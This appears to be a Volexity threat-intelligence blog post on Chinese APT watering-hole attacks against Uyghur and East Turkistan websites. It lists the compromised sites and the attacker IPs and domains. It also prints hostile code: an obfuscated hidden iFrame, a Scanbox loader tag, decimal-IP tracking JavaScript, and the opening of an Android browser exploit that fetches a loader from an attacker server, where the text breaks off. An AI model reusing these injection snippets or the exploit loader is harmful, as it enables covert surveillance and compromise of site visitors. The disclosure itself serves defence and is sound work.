Over the last several years, numerous reports have emerged regarding the shocking treatment of Uyghurs, a Muslim minority ethnic group that makes up a large part of the Xinjiang Uyghur Autonomous Region (XUAR) in northwest China. The Uyghur people, especially those that want the XUAR to become its own nation under the name East Turkistan, are considered to be a threat to the Chinese Communist Party (CCP). Recent reporting has shown that this point of view by the CCP against the Uyghur people has resulted in wide-scale harassment, relocation to detention camps, and oppressive high-tech surveillance aimed at tracking physical movements and behavior. With all of these reports on physical real-world issues, it should come as no surprise that cyberspace has become a battle ground for the Uyghur people. The level of surveillance occurring in China against Uyghurs extends well beyond their borders and has fully entered the digital realm. In this blog, Volexity plans to shed some light on the barrage of cyber attacks that have been unleashed upon Uyghurs.

Since its formation in 2013, Volexity has worked closely with various non-governmental organizations (NGOs), activists, dissidents, human rights defenders, and other highly targeted groups that are often at a severe disadvantage with respect to the threat actors that are targeting them. Volexity’s goal is to always level the playing field as much as possible through awareness and by collaboratively building more defensible and resilient networks and systems. Over the years, Volexity has gained amazing insight into what could be considered to be some of the most advanced and scariest cyber attacks imaginable.  Volexity has worked closely with various Uyghur individuals and organizations and has witnessed an unrelenting series of attacks that started well before 2013 and continue to this day. In the last few years, Volexity has observed an increase in the number of compromised Uyghur and East Turkistan websites. These websites have been leveraged to track and launch attacks against the Uyghur diaspora around the world. This report details the wide variety of websites that have been used for surveillance and attacks and specifically looks into a very recent campaign targeting mobile devices.

Key highlights from these most recent series of attacks against the Uyghur diaspora include:

  • A wide-ranging series of digital surveillance and exploitation campaigns identified via multiple strategically compromised websites
  • Mobile device users running Android OS targeted via an exploit that will deliver a 64-bit ARM executable
  • Website visitors tracked and targeted via Scanbox profiling and exploitation framework
  • Attacker’s arsenal includes Google Applications for gaining access to e-mails and contact lists of Gmail accounts via OAuth
  • Doppelganger domains emulating Google, the Turkistan Times, and the Uyghur Academy leveraged by attackers
  • At least two separate Chinese APT groups responsible for ongoing campaigns against Uyghurs

As part of these ongoing attacks, Volexity has identified at least 11 Uyghur and East Turkistan related websites that have been compromised and leveraged for surveillance and exploitation. While this number is definitely less than that observed by Volexity as part of a mass digital surveillance campaign by OceanLotus a few years ago, these websites do make up a significant number of the total websites that provide Uyghur and East Turkistan news and resources. Volexity believes that the attacks described in the post are designed to target Uyghurs at large, of which the majority will be members of the Uyghur diaspora. The systematic targeting and compromise websites that are run by and cater to Uyghurs make it clear they are the primary targets. However, each of the compromised websites are banned by the great firewall in China, leaving largely only those outside of the country as targets and potential victims.

Compromised Sites

Volexity has been able to identify at least 11 different Uyghur and East Turkistan websites that have been strategically compromised and leveraged as part of a series of attack campaigns. In some cases, the websites have been continuously leveraged to attack visitors going back at least four years. While it is not always possible to tie some observed activity to a specific threat group, Volexity believes that at least two Chinese APT groups are responsible for the majority of the attack activity described in this blog.

Organization Website Compromised Page
Uyghur Academy www.akademiye.org Main Index
/ug/wp-content/themes/goodnews/js/custom.js?ver=1.0/ug/wp-content/themes/goodnews/js/Jplayer.html (iFrame)
Turkistantimes turkistantimes.com Directly on select pages such as: /en/news-10597.html

/m/news-10500.html

Uighur Times (English) uighurtimes.com Main Index
Uighur Times (Chinese) weiwuer.com Main Index
Uighur Times (Uyghur) iuyghur.com Main Index
Istiqlal Haber istiqlalhaber.com /js/jquery.easing.1.3.js
Turkistan Press turkistanpress.com /js/jquery.easing.1.3.js
Turkistan TV turkistantv.com /js/lightbox/css/lightbox.html (iFrame)
East Turkistan Education and Solidarity
Association (ETESA)
maarip.org Main index pages for English and Uyghur versions of the website
World Uyghurs Writers Union wetinim.com Main Index
Istiqlal TV istiqlal.net Main index

Unauthorized Code

The websites listed above all contained one or more instances of malicious code on them. The code was often updated over time and some websites even housed multiple different instances of malicious code at the same time. The majority of the websites that were linked to by the malicious code were unavailable when Volexity examined them or returned 0-byte responses. The latter indicating that whitelisting may be employed or that the attack operation was otherwise on pause or being leveraged to simply track visitors.  The primary instances where code was returned involved the deployment of Scanbox by one actor and exploit code targeting Android users by another.

Evil Eye

In many cases where the malicious websites were in operation but Volexity did not observe an active payload, the URLs followed a somewhat distinctive pattern. In almost all instances, the URLs from these sites were loaded via an iFrame. Below is a list of the observed URL patterns, as extracted from the iFrame tags.

  • http://103.43.18.243:5634/WU95IhiPIMsg.html
  • http://182.61.171.167:9321/8fmtCI2j2Xk0.html
  • http://182.61.173.209:8372/uxwrR64eZz0Y.html
  • http://45.76.209.90:8352/reA4iy3gl2.html
  • https://www.google-analysis.info/UxiZIwIcsta2.html
  • https://www.google-analysis.info/NsyXHDkBR2yK.html
  • https://turkistantlmes.com/aNQBEaMX2Bc4.html
  • https://turkistantlmes.com/7GbMYn8ldTRK.html
  • https://akademlye.org/t5UPArzQAjd2.html

These URLs are typically loaded in plaintext without any sort of obfuscation. However, in two instances, one of the earlier instances identified on the Uyghur Academy website, and one on the website of the World Uyghurs Writers Union, obfuscation was applied by way of multiple iFrames, and with the URL itself being obfuscated. An example of the obfuscated code as found on the World Uyghurs Writers Union site is shown below.

<iframe src=”&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x31;&#x30;&#x33;&#x2e;&#x34;&#x33;&#x2e;&#x31;&#x38;&#x2e;&#x32;&#x34;&#x33;&#x3a;&#x35;&#x36;&#x33;&#x34;&#x2f;&#x57;&#x55;&#x39;&#x35;&#x49;&#x68;&#x69;&#x50;&#x49;&#x4d;&#x73;&#x67;&#x2e;&#x68;&#x74;&#x6d;&#x6c;” width=0 height=0></iframe>

Once converted, the above iFrame will attempt to load content from http://103.43.18.243:5634/WU95IhiPIMsg.html.

Volexity has also observed similar URL patterns and even doppelganger domains leveraged to target Tibetan interests as well. Volexity believes there is likely overlap between these two sets of activity.  Volexity currently tracks the above listed activity as a group under the moniker Evil Eye. The Evil Eye threat actor is also responsible for targeting users with Android exploits and malware, which is detailed below within this report.

Scanbox

Another notable instance of code found on these compromised websites includes the aforementioned Scanbox instance that was seen in istiqlal.net. The following code was observed on the site for a period of time in mid-April 2019.

<script src=”https://stats.uyghurmedia[.]top:443/i/?3″></script>

The script would load the Scanbox framework, collecting data on the system and transmitting it via HTTP POST request to stats.uyghurmedia[.]top:443/i/recv.php.

In this instance, the attackers leveraged both a domain they created in an effort to blend in as legitimate and TLS to evade network detection. This domain also has ties to an operation designed to target Google OAuth access to Gmail accounts as described further in this report. This is not the first time Volexity has observed Scanbox leveraged in attacks against the Uyghur community. In 2016, Volexity had identified a similar Scanbox instance on the Uyghur Academy website.

IP in Decimal Notation

One of the more interesting versions of unauthorized code that Volexity observed was on the website of the World Uyghurs Writers Union. The following code was observed on the website:

<script type=”text/javascript”> !function(a,b){a=document.createElement(“script”),b=document.getElementsByTagName(“script”)[0], a.async=!0,a.src=”//760037399/2″,b.parentNode.insertBefore(a,b)}()

In this case, the value “760037399” converts to the Choopa IP address 45.77.64.23 and a request is made to the URL http://45.77.64.23/2. Volexity believes this code has primarily been leveraged for tracking, as it will ultimately report back a few pieces of information to the site to include its referer and possibly even cookies. Volexity has previously observed this same IP decimal notation and tracking code on other sites in the past.

Android Mobile Users Targeted

In mid-August, Volexity identified new malicious code on the websites of the Uyghur Academy, Turkistan Press, Turkistan TV, and Istiqlal Haber. The websites contained a few different methods of loading the following code:

<iframe src=”https://akademlye[.]org/ztTXvf” width 0 height 0 visibility hidden></iframe>

This malicious domain that was designed to appear like the legitimate website of the Uyghur Academy. However, in this instance the “i” has been replaced with a lowercase “L.” This follows a similar theme to that was seen via the “turkistantlmes[.]com” website leveraged by the attackers. The code on this website appears to target the Chrome browser of the Android operating system.

The initial code of the exploit contained the following, which was actually fairly well documented through comments:

<html> <script> var IP_A12A3079E14CED46E69BA52B8A90B21A = “149.28.207.244”; var IP_HEX_06236F18F5EA830A8DBB2AA5E5AC4E00 = “0xf4cf1c95”;  // 4c08a8c0 var PORT_463C00141B4C3A7F76ACD3540052F8F5 = 8080; var APP_PATH_D892A52BCC30FA6168C260B8695D24F7 = “/data/data/com.android.browser/loader”; var portshell=parseInt((PORT_463C00141B4C3A7F76ACD3540052F8F5/256+(PORT_463C00141B4C3A7F76ACD3540052F8F5%256)*256))*256*256+2;

var s=”GET /dev/loader HTTP/1.0\r\nHost: “+ IP_A12A3079E14CED46E69BA52B8A90B21A+”:”+PORT_463C00141B4C3A7F76ACD3540052F8F5.toString()+”\r\nConnection: close\r\n\r\n”;